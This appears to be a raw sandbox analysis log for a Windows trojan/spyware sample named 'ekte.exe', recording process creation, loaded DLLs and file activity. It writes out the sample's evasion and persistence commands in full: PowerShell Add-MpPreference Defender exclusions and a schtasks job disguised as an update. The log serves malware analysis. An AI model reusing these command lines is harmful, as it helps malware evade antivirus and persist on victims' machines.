            Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@24/19@12/6
            Source: C:\Users\user\Desktop\ekte.exe; File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Users\user\Desktop\ekte.exe; File created: C:\Users\user\AppData\Local\Temp\tmp47BA.tmp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(...............<..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......M..........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......`..........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......l..........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......P..................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(.)..... .......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(..........................................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............(.).....$.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x........ .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x........ .........................s............................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......& .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.).....2.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......D .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......W .........................s....................l.......................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x.......c .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......x.......u .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......x........ .........................s............(.).............................Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................P.......................(.P.....4.......\.......................................................................................Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................P.........................s..............).............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................P.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................P.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P.............................!Q.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................-Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................?Q.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................KQ.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........]Q.........................s............(....... .......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................iQ.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P.............................{Q.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......Q.........................s............(.......$.......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................Q.........................s..............).............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................Q.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..).....................................(.P..............................Q.........................s..............).....l.......(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............(.................).............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................R.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............(...............(...............
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................N.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................5O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................AO.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................SO.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........qO.........................s............H....... .......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................}O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......O.........................s............H.......$.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............................................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................O.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................P.........................s....................l.......................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................P.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................%P.........................s............H...............................
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................1P.........................s............H...............................
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...................@........E......................................................................Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....................@........E..............................................j.......................Jump to behavior
            Source: ekte.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ekte.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\ekte.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\ekte.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\findstr.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: ekte.exe ReversingLabs: Detection: 63%
            Source: C:\Users\user\Desktop\ekte.exe File read: C:\Users\user\Desktop\ekte.exe:Zone.Identifier
            Source: unknown Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
            Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
            Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
            Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
            Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
            Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64win.dll
            Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\System32\taskeng.exe Section loaded: ktmw32.dll
            Source: C:\Windows\System32\taskeng.exe Section loaded: wevtapi.dll
            Source: C:\Windows\System32\taskeng.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\taskeng.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\System32\taskeng.exe Section loaded: xmllite.dll
            Source: C:\Windows\System32\taskeng.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64cpu.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: riched20.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: bcrypt.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\findstr.exe Section loaded: secur32.dll
